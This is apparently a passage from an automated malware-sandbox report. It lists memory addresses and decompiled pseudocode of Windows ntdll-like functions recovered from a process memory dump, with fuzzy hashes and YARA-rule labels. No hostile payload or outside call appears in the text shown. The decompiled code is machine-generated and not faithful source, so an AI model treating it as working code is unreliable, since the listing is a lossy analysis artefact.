                                      0x036ef722
                                      0x036ef726
                                      0x03734770
                                      0x036ef765
                                      0x036ef769
                                      0x036ef769
                                      0x036ef732
                                      0x0373477a
                                      0x00000000
                                      0x0373477a
                                      0x036ef738
                                      0x036ef73a
                                      0x036ef73c
                                      0x036ef73f
                                      0x036ef746
                                      0x036ef778
                                      0x036ef7a9
                                      0x036ef7a9
                                      0x036ef754
                                      0x036ef75a
                                      0x036ef75d
                                      0x036ef75f
                                      0x036ef761
                                      0x036ef76f
                                      0x036ef771
                                      0x036ef771
                                      0x036ef76f
                                      0x036ef763
                                      0x00000000
                                      0x036ef763
                                      0x036ef77d
                                      0x036ef7a3
                                      0x036ef7a5
                                      0x00000000
                                      0x036ef7a5
                                      0x036ef77f
                                      0x036ef782
                                      0x036ef784
                                      0x036ef786
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036ef788
                                      0x036ef748
                                      0x036ef74d
                                      0x036ef78d
                                      0x036ef793
                                      0x036ef7b7
                                      0x036ef7bc
                                      0x00000000
                                      0x036ef7bc
                                      0x036ef798
                                      0x00000000
                                      0x00000000
                                      0x036ef79d
                                      0x036ef7b0
                                      0x00000000
                                      0x036ef7b0
                                      0x036ef79f
                                      0x00000000
                                      0x036ef74f
                                      0x036ef74f
                                      0x00000000
                                      0x036ef74f

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Actx
                                      • API String ID: 0-89312691
                                      • Opcode ID: 005f06dd2c54b52a5b8bd5da7bdc2364531742522e87457cc423add977ef0e9c
                                      • Instruction ID: 2de2f0bd491fd3ec92b60c9b5f1303f800455c61878a23b72cc5de3de2751051
                                      • Opcode Fuzzy Hash: 005f06dd2c54b52a5b8bd5da7bdc2364531742522e87457cc423add977ef0e9c
                                      • Instruction Fuzzy Hash: 9F11E9343166028BEF24CD1DA658735B2D9EB86214F2B452EE861CF391D770C849A340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03778DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 71%
                                      			E03778DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x37a0d50);
				E0371D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03755720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0371DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0371DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0371D130(_t34, _t39, _t40);
			}





                                      0x03778df1
                                      0x03778df1
                                      0x03778df1
                                      0x03778df1
                                      0x03778df1
                                      0x03778df1
                                      0x03778df3
                                      0x03778df8
                                      0x03778dfd
                                      0x03778e00
                                      0x03778e0e
                                      0x03778e2a
                                      0x03778e36
                                      0x03778e38
                                      0x03778e3c
                                      0x03778e46
                                      0x03778e46
                                      0x03778e36
                                      0x03778e50
                                      0x03778e56
                                      0x03778e59
                                      0x03778e5c
                                      0x03778e60
                                      0x03778e67
                                      0x03778e6d
                                      0x03778e73
                                      0x03778e74
                                      0x03778eb1
                                      0x03778ebd

                                      Strings
                                      • Critical error detected %lx, xrefs: 03778E21
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Critical error detected %lx
                                      • API String ID: 0-802127002
                                      • Opcode ID: ff48ef7cc12f9027981442c3a46195a4643dd5e493df6a5a6584e51cb4f95724
                                      • Instruction ID: 90f920e9ab45c31a1de40042a877c4826b18a763526a6ef8d1d6f2b38bba4bb3
                                      • Opcode Fuzzy Hash: ff48ef7cc12f9027981442c3a46195a4643dd5e493df6a5a6584e51cb4f95724
                                      • Instruction Fuzzy Hash: A1115BB6D14348EADF24CFB8C90A7ECBBB0BB04315F28425DE4296B282C3B40601CF16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0375FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                      Download Yara Rule
                                      Strings
                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0375FF60
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                      • API String ID: 0-1911121157
                                      • Opcode ID: dddd3228b6005b0cc214f758ebdb6ad95d34ff038aaa1698cb68a0a3fb22c543
                                      • Instruction ID: fc03e738ac2e9771787bd9469fd73018ba2f9954a279ba27ea1f2805588c4789
                                      • Opcode Fuzzy Hash: dddd3228b6005b0cc214f758ebdb6ad95d34ff038aaa1698cb68a0a3fb22c543
                                      • Instruction Fuzzy Hash: 41112676910244EFDB26EF54C848F9CBBB1FF09714F188454F905AB6A1C7B99950CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03795BA5, Relevance: .6, Instructions: 592COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 88%
                                      			E03795BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x37a1178);
				E0371D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03794C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0370D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03795542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x37b60e8;
								if( *0x37b60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x37b60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03709710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03706DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0370F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0370F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0370F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0370FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0370FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0370F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0370F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03794CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0371D130(_t427, _t494, _t511);
				}
			}










































































                                      0x03795ba5
                                      0x03795baa
                                      0x03795baf
                                      0x03795bb4
                                      0x03795bb6
                                      0x03795bbc
                                      0x03795bbe
                                      0x03795bc4
                                      0x03795bcd
                                      0x03795bd3
                                      0x03795bd6
                                      0x03795bdc
                                      0x03795be0
                                      0x03795be3
                                      0x03795beb
                                      0x03795bf2
                                      0x03795bf8
                                      0x03795bfe
                                      0x03795c04
                                      0x03795c0e
                                      0x03795c18
                                      0x03795c1f
                                      0x03795c25
                                      0x03795c2a
                                      0x03795c2c
                                      0x03795c32
                                      0x03795c3a
                                      0x03795c3f
                                      0x03795c42
                                      0x03795c48
                                      0x03795c5b
                                      0x03795c5b
                                      0x03795c2c
                                      0x03795cb7
                                      0x03795cb9
                                      0x03795cbf
                                      0x03795cc2
                                      0x03795cca
                                      0x03795ccb
                                      0x03795ccb
                                      0x03795cd1
                                      0x03795cd7
                                      0x03795cda
                                      0x03795ce1
                                      0x03795ce4
                                      0x03795ce7
                                      0x03795ced
                                      0x03795cf3
                                      0x03795cf9
                                      0x03795cff
                                      0x03795d08
                                      0x03795d0a
                                      0x03795d0e
                                      0x03795d10
                                      0x00000000
                                      0x00000000
                                      0x03795d16
                                      0x03795d1a
                                      0x00000000
                                      0x00000000
                                      0x03795d20
                                      0x03795d22
                                      0x03795d25
                                      0x03795d2f
                                      0x03795d2f
                                      0x03795d33
                                      0x03795d3d
                                      0x03795d49
                                      0x03795d4b
                                      0x00000000
                                      0x00000000
                                      0x03795d5a
                                      0x03795d5d
                                      0x03795d60
                                      0x00000000
                                      0x00000000
                                      0x03795d66
                                      0x03795d69
                                      0x00000000
                                      0x00000000
                                      0x03795d6f
                                      0x03795d6f
                                      0x03795d73
                                      0x03795d79
                                      0x03795d7f
                                      0x03795d86
                                      0x03795d95
                                      0x03795d98
                                      0x03795dba
                                      0x03795dcb
                                      0x03795dce
                                      0x03795dd3
                                      0x03795dd6
                                      0x03795dd8
                                      0x03795de6
                                      0x03795dec
                                      0x03795dee
                                      0x03795df1
                                      0x03795df3
                                      0x0379635a
                                      0x0379635a
                                      0x00000000
                                      0x0379635a
                                      0x03795dfe
                                      0x03795e02
                                      0x03795e05
                                      0x03795e07
                                      0x03795e10
                                      0x03795e13
                                      0x03795e1b
                                      0x03795e1c
                                      0x03795e21
                                      0x03795e22
                                      0x03795e23
                                      0x03795e25
                                      0x03795e2a
                                      0x03795e2c
                                      0x03795e2e
                                      0x03795e36
                                      0x03795e39
                                      0x03795e42
                                      0x03795e47
                                      0x03795e4d
                                      0x03795e54
                                      0x03795e54
                                      0x03795e54
                                      0x03795e2e
                                      0x03795e5c
                                      0x03795e5f
                                      0x03795e62
                                      0x03795e64
                                      0x03795e6b
                                      0x03795e70
                                      0x03795e7a
                                      0x03795e7a
                                      0x03795e7a
                                      0x03795e6b
                                      0x03795e7e
                                      0x03795e7f
                                      0x03795e7f
                                      0x03795e81
                                      0x03795e87
                                      0x03795e8b
                                      0x03795e8c
                                      0x03795e8c
                                      0x03795e8c
                                      0x03795e9a
                                      0x03795e9c
                                      0x03795ea2
                                      0x03795ea6
                                      0x03795f50
                                      0x03795f50
                                      0x03795f57
                                      0x03795f66
                                      0x03795f66
                                      0x03795f66
                                      0x03795f68
                                      0x03795f6a
                                      0x037963d0
                                      0x00000000
